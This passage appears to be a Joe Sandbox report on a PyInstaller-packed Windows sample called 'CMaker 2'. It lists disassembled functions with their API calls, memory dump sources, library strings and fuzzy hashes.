                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B91A265B0C68281F6B1ABD1E4713BE67A8EF89780F800031EA5E67B96DF3CE501C714
                                                                                                                                                                                  Function 00007FFD935A1497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                  • API String ID: 0-1087561517
                                                                                                                                                                                  • Opcode ID: d743759746665b7db7d4fba4d59fd9459b03d2bc73fc4485894cad057df26e57
                                                                                                                                                                                  • Instruction ID: 55d757bbae87fad5fe4c6fd928fded7c314bfa0736c1741609c8112309de9d43
                                                                                                                                                                                  • Opcode Fuzzy Hash: d743759746665b7db7d4fba4d59fd9459b03d2bc73fc4485894cad057df26e57
                                                                                                                                                                                  • Instruction Fuzzy Hash: 21D16C65B09A8341FBB1ABE2D5757F912AAAF48784F444032ED0DA7ACADE3DE505C310
                                                                                                                                                                                  Function 00007FFD935A26F8 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 257COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                  • API String ID: 0-2528746747
                                                                                                                                                                                  • Opcode ID: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                                  • Instruction ID: 9b09d66797edd7fc86cbff5053c8c9adba8470037d83022dae4c0e69e27ffc93
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                                  • Instruction Fuzzy Hash: C6B1CD25F0868395FB31ABE1D8A01FD2BA9EF84788F504036D91D67A95DE3CE646C340
                                                                                                                                                                                  Function 00007FF6FABEC0F8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC17D
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC18B
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC1B5
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC223
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC22F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                  • Opcode ID: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
                                                                                                                                                                                  • Instruction ID: 538b4d270b647e6ecd5f18ba376c5c2695be891ff24fab5e14c221a676154de0
                                                                                                                                                                                  • Opcode Fuzzy Hash: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431C361B0AA0285EF15DB42A8446756394BF0BBA4F9A45B5DD3EC73C1FF3CE9448341
                                                                                                                                                                                  Function 00007FF6FABE6D20 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                  • Opcode ID: ad401320b04244f1446b4500ec97eca793b1beecba4cdffe4afa79db84254f8d
                                                                                                                                                                                  • Instruction ID: 38e3965ec0dceb2b969462d85f5543efb11a0461e5708e0d7f90792d12168cf7
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad401320b04244f1446b4500ec97eca793b1beecba4cdffe4afa79db84254f8d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A0217F71A0C64242EB109B55E49023AA3A0FF967A4F9482B5EABDC3AE4EF7CD4548700
                                                                                                                                                                                  Function 00007FF6FABFACD0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                  • Opcode ID: 2d7e9b92152e969ab98a5bc7bfa55def46723a2a205e91dfbdb8d38609dd549d
                                                                                                                                                                                  • Instruction ID: 901a0e3403c2e3a2ec85c7015842460940c5dfd772f390522d697e747fe581b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d7e9b92152e969ab98a5bc7bfa55def46723a2a205e91dfbdb8d38609dd549d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121A12CB2E68241FB5CA7B1565113952524F967B0F9C47BCE93EC76D6FE2CB4108200
                                                                                                                                                                                  Function 00007FF6FAC07DCC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                  • Opcode ID: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
                                                                                                                                                                                  • Instruction ID: ac7526796cc28ec7220d2e8a25e4bca853cbd9ca9e020d392f39f8e1510f68a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52118B61B18A4586E7508B02E854339B2B0FB98BE4F008274EA7EC77E4EF7CD905C740
                                                                                                                                                                                  Function 00007FFD935A231F Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 388COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B22408
                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                  • API String ID: 4199793457-1635961163
                                                                                                                                                                                  • Opcode ID: a8ee6e3859b99f2b17f28d4ce1b69a439d2afc43d39ac9c6cf93f3c5d709489f
                                                                                                                                                                                  • Instruction ID: 4214e480a4b4ab11cf03eef332da5b06e75f6437bd2c824c4cb34c27c25ec7f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8ee6e3859b99f2b17f28d4ce1b69a439d2afc43d39ac9c6cf93f3c5d709489f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A502D572B086C281F7708B96E4A13BD77A8EB85B84F048035DAADA7795DF3CE591C700
                                                                                                                                                                                  Function 00007FF6FABE7490 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetCurrentProcess.KERNEL32 ref: 00007FF6FABE6D40
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: OpenProcessToken.ADVAPI32 ref: 00007FF6FABE6D53
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.ADVAPI32 ref: 00007FF6FABE6D78
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetLastError.KERNEL32 ref: 00007FF6FABE6D82
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.ADVAPI32 ref: 00007FF6FABE6DC2
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FABE6DDE
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: CloseHandle.KERNEL32 ref: 00007FF6FABE6DF6
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00007FF6FABE2A89), ref: 00007FF6FABE751C
                                                                                                                                                                                  • LocalFree.KERNEL32 ref: 00007FF6FABE7525
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                  • Opcode ID: 5e81501040e639016633110d7dcf39a24e93b3ab722f428aa23c19e56a2a7eac
                                                                                                                                                                                  • Instruction ID: b992a89898bb565822ee14b12bf8dcc684925b86b11fbfce38b7434a957f9b2c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e81501040e639016633110d7dcf39a24e93b3ab722f428aa23c19e56a2a7eac
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD215C71A1864282FB10AB10E8553FA62A5EF89780F8494B5EA6EC37D6FF3CD944C740
                                                                                                                                                                                  Function 00007FF6FABFAE48 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE57
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE8D
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEBA
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAECB
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEDC
                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEF7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                  • Opcode ID: cc964c4150d7d1fd02e5e9c39ce5e1c415a6b070cf0dbb5d7f55af31f0ea2871
                                                                                                                                                                                  • Instruction ID: beb11b4b1b7a27f66c52ed043af6a477a8f72c20a326c3831d9f259a2054f206
                                                                                                                                                                                  • Opcode Fuzzy Hash: cc964c4150d7d1fd02e5e9c39ce5e1c415a6b070cf0dbb5d7f55af31f0ea2871
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C117538B1C28245FB5897B1565103962515F9A7B0FAC47BCE93EC77DAFE2DB4418300
                                                                                                                                                                                  Function 00007FFD9DF9FB78 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                  • String ID: Invalid filter ID: %llu$dict_size$dist$start_offset
                                                                                                                                                                                  • API String ID: 3568877910-3368833446
                                                                                                                                                                                  • Opcode ID: 3d5f765dc4ef74a87ebfd11056e1228d9b848d22299d8acfc886f1edab02fccc
                                                                                                                                                                                  • Instruction ID: 8cbd412d3f665837ad971a608a6c54c8960fac5e6fae1223f7d4f5eeb4166507
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d5f765dc4ef74a87ebfd11056e1228d9b848d22299d8acfc886f1edab02fccc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62411D71F08A87D1EA748F96E96207823A0AF95794B448331DA9D477E0FF7CE9A58700
                                                                                                                                                                                  Function 00007FF6FABF9640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                  • Opcode ID: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
                                                                                                                                                                                  • Instruction ID: c3be862846ba974b8ca6b4ca6790a5b9614dc42c4bc37e6315a7f21a601d0e97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F062A9B09A0681EB148B64E8443795330BF497A5F949679DA7EC51E4FF2CD049C700
                                                                                                                                                                                  Function 00007FFD9F3BC0E0 Relevance: 7.6, APIs: 5, Instructions: 60encryptionCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1995843185-0
